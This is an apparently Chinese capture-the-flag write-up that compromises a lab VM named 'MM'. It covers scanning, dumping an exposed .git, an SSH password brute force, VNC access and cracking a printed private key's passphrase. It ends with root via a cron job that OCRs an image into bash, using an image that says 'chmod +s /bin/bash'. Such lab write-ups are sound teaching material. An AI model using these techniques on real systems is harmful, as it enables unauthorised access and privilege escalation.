MM 测试

信息搜集

主机发现

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c7:52:97, IPv4: 192.168.43.61
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1 16:7b:48:15:a2:34 (Unknown: locally administered)
192.168.43.37 24:b2:b9:b8:53:a5 (Unknown)
192.168.43.66 08:00:27:14:11:59 PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.141 seconds (119.57 hosts/sec). 3 responded

192.168.43.66

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
┌──(root㉿kali)-[~]
└─# rustscan -a 192.168.43.66 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.43.66:22
Open 192.168.43.66:80
Open 192.168.43.66:5901
Open 192.168.43.66:6001
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.66
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-22 05:29 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Initiating ARP Ping Scan at 05:29
Scanning 192.168.43.66 [1 port]
Completed ARP Ping Scan at 05:29, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:29
Completed Parallel DNS resolution of 1 host. at 05:29, 0.18s elapsed
DNS resolution of 1 IPs took 0.18s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:29
Scanning 192.168.43.66 [4 ports]
Discovered open port 22/tcp on 192.168.43.66
Discovered open port 80/tcp on 192.168.43.66
Discovered open port 5901/tcp on 192.168.43.66
Discovered open port 6001/tcp on 192.168.43.66
Completed SYN Stealth Scan at 05:29, 0.03s elapsed (4 total ports)
Initiating Service scan at 05:29
Scanning 4 services on 192.168.43.66
Completed Service scan at 05:29, 6.10s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.66
NSE: Script scanning 192.168.43.66.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.32s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.04s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Nmap scan report for 192.168.43.66
Host is up, received arp-response (0.00065s latency).
Scanned at 2026-04-22 05:29:00 EDT for 8s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15/h5hBsS/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9/wPmo6RBeb1d5t11SP8R5UHyI/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
| 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-title: Hi
| http-git:
| 192.168.43.66:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: 4
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.62 (Debian)
5901/tcp open vnc syn-ack ttl 64 VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
| VNC Authentication (2)
| Tight (16)
| Tight auth subtypes:
|_ STDV VNCAUTH_ (2)
6001/tcp open X11 syn-ack ttl 64 (access denied)
MAC Address: 08:00:27:14:11:59 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/22%OT=22%CT=%CU=41618%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=69E894E4%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Uptime guess: 42.917 days (since Tue Mar 10 07:29:11 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.65 ms 192.168.43.66

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds
Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.454KB)
  • 5901 VNC

  • 6001 X11(X11 使用从 6000 开始的端口)

  • 80端口存在.git

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
┌──(root㉿kali)-[/opt/tools/git/GitDump-master]
└─# python3 git-dump.py http://192.168.43.66/.git/ ggg
URL for test: http://192.168.43.66/.git/
Fetching: http://192.168.43.66/.git/index
Fetching: http://192.168.43.66/.git/FETCH_HEAD
Fetching: http://192.168.43.66/.git/HEAD
Fetching: http://192.168.43.66/.git/ORIG_HEAD
Fetching: http://192.168.43.66/.git/config
Fetching: http://192.168.43.66/.git/description
Fetching: http://192.168.43.66/.git/info/exclude
Fetching: http://192.168.43.66/.git/packed-refs
Fetching: http://192.168.43.66/.git/info/refs
Fetching: http://192.168.43.66/.git/logs/HEAD
Fetching: http://192.168.43.66/.git/logs/refs/heads/develop
Fetching: http://192.168.43.66/.git/logs/refs/remotes/origin/develop
Fetching: http://192.168.43.66/.git/logs/refs/remotes/origin/step_develop
Fetching: http://192.168.43.66/.git/logs/refs/remotes/origin/master
Fetching: http://192.168.43.66/.git/refs/heads/develop
Fetching: http://192.168.43.66/.git/logs/refs/remotes/github/master
Fetching: http://192.168.43.66/.git/refs/heads/master
Fetching: http://192.168.43.66/.git/refs/remotes/origin/master
Fetching: http://192.168.43.66/.git/logs/refs/heads/master
Fetching: http://192.168.43.66/.git/refs/remotes/origin/develop
Fetching: http://192.168.43.66/.git/refs/remotes/origin/step_develop
Fetching: http://192.168.43.66/.git/refs/remotes/github/master
Fetching: http://192.168.43.66/.git/refs/remotes/origin/HEAD
Fetching: http://192.168.43.66/.git/objects/info/packs
Parsing Index File
Fetching: http://192.168.43.66/.git/objects/00/00000000000000000000000000000000000000
Fetching: http://192.168.43.66/.git/objects/bd/9990a1d46f17332711ccdf1d5ca32d584ae5c3
Fetching: http://192.168.43.66/.git/objects/f9/f7d8ba3292488a6e7f9fa21d0968ca7bbd6637
Fetching: http://192.168.43.66/.git/objects/b8/295d6c67f5f2df8a3649af13bf6867b221cd17
Fetching: http://192.168.43.66/.git/objects/19/36b7f0b8bc34642423c19738fab503a9d967de
Fetching: http://192.168.43.66/.git/objects/f7/cc50a34b65f1c6cf3c8bd10e2b78271c348e35
Fetching: http://192.168.43.66/.git/objects/0e/f29c348d792456e322c2e804ccaf0feb91b05d
Script Executed Successfully
Run following command to retrieve source code: cd output && git checkout -- .

┌──(root㉿kali)-[/opt/tools/git/GitDump-master]
└─# cd output

┌──(root㉿kali)-[/opt/tools/git/GitDump-master/output]
└─# ls

┌──(root㉿kali)-[/opt/tools/git/GitDump-master/output]
└─# ls -al
total 12
drwxr-xr-x 3 root root 4096 Apr 22 06:51 .
drwxr-xr-x 6 root root 4096 Apr 22 06:04 ..
drwxr-xr-x 6 root root 4096 Apr 22 06:51 .git

┌──(root㉿kali)-[/opt/tools/git/GitDump-master/output]
└─# git log
commit 1936b7f0b8bc34642423c19738fab503a9d967de (HEAD -> master)
Author: mingmingjiu <mingmingjiu@mm.dsz>
Date: Sun Apr 19 00:10:25 2026 -0400

4

commit b8295d6c67f5f2df8a3649af13bf6867b221cd17
Author: mingmingjiu <mingmingjiu@mm.dsz>
Date: Sun Apr 19 00:08:12 2026 -0400

3

commit f7cc50a34b65f1c6cf3c8bd10e2b78271c348e35
Author: mingmingjiu <mingmingjiu@mm.dsz>
Date: Sun Apr 19 00:07:59 2026 -0400

2

commit f9f7d8ba3292488a6e7f9fa21d0968ca7bbd6637
Author: mingmingjiu <mingmingjiu@mm.dsz>
Date: Sun Apr 19 00:07:17 2026 -0400

1

┌──(root㉿kali)-[/opt/tools/git/GitDump-master/output]
└─#

写入hosts

1
192.168.43.66 mm.dsz

image

爆破密码

mingmingjiu:12345678

但并没有用

尝试爆破ssh

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/opt/tools]
└─# hydra -l mingmingjiu -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.66 -I -e nsr
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-04-22 07:09:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344402 login tries (l:1/p:14344402), ~896526 tries per task
[DATA] attacking ssh://192.168.43.66:22/
[22][ssh] host: 192.168.43.66 login: mingmingjiu password: mingmingjiu
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-04-22 07:09:06

虽然拿到了密码但是无法通过ssh登录那么通过vnc连接

image

image

image

在下载里面有很多文件,其中id_ed25519存在私钥,但是不好复制出来,这里可以反弹shell(shell如果闪退可以alt+F2输入反弹shlel命令)

image

image

1
2
3
4
5
6
7
8
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC+gfZ42R
erBHXe6e2BZ29eAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIF9n3sObsMFbp74d
D47XdVbNiKjCK74CSnFvISXd2g6SAAAAkI6UnrIq/sNwjobpmZ+xs1zOY1rhgaOqdcChuE
wAi9nMeoVv60Q7/cvDRxdKPSUbn7JbKjU3AZiANgFjP65eVsUaAqBrE66Zl/q6pYpDUuIJ
a2wbsieVAGCjeydK0Kp1ag32is1WOo8K7I3knWMBXj+jrjdy+S4F5OyVq9afg+nAu0Tpec
i4qqi68qhKNHOWRA==
-----END OPENSSH PRIVATE KEY-----

私钥存在passphrase保护

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kali)-[/tmp/aaa]
└─# vim id_rsa

┌──(root㉿kali)-[/tmp/aaa]
└─# chmod 600 id_rsa
┌──(root㉿kali)-[/tmp/aaa]
└─# ssh -i id_rsa ll104567@192.168.43.66
Enter passphrase for key 'id_rsa':
ll104567@192.168.43.66's password:
┌──(root㉿kali)-[/tmp/aaa]
└─# ssh2john id_rsa > hash.txt


┌──(root㉿kali)-[/tmp/aaa]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678 (id_rsa)
1g 0:00:00:00 DONE (2026-04-22 07:50) 1.265g/s 40.50p/s 40.50c/s 40.50C/s 123456..butterfly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/tmp/aaa]
└─# ssh -i id_rsa ll104567@192.168.43.66
Enter passphrase for key 'id_rsa':
Linux MM 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ll104567@MM:~$

提权

ll104567 -> root

1
2
3
4
5
6
7
8
9
10
ll104567@MM:~$ cd /opt/
ll104567@MM:/opt$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Apr 19 00:26 .
drwxr-xr-x 18 root root 4096 Mar 18 2025 ..
-rwxr-xr-x 1 root root 36 Apr 19 00:26 a.sh
ll104567@MM:/opt$ cat a.sh
#!/bin/bash

gocr /tmp/go.png |bash
  • gocr: 这是一个开源的 OCR(光学字符识别)工具,用来识别图片中的文字。
  • | bash: 它将识别出来的文字直接丢给 bash 执行。

上传pspy查看是否是存在定时任务

image

发现存在的

使用convert生成图片

1
convert -size 600x100 xc:white -font "FreeMono" -pointsize 48 -fill black -draw "text 20,60 'chmod +s /bin/bash'" go.png
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
l104567@MM:/tmp$ wget http://192.168.43.61:8081/go.png
--2026-04-22 07:56:45-- http://192.168.43.61:8081/go.png
Connecting to 192.168.43.61:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3339 (3.3K) [image/png]
Saving to: ‘go.png’

go.png 100%[=============================================>] 3.26K --.-KB/s in 0s

2026-04-22 07:56:45 (357 MB/s) - ‘go.png’ saved [3339/3339]
ll104567@MM:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
ll104567@MM:/tmp$ /bin/bash -p
bash-5.0# id
uid=1001(ll104567) gid=1001(ll104567) euid=0(root) egid=0(root) groups=0(root),1001(ll104567)
bash-5.0#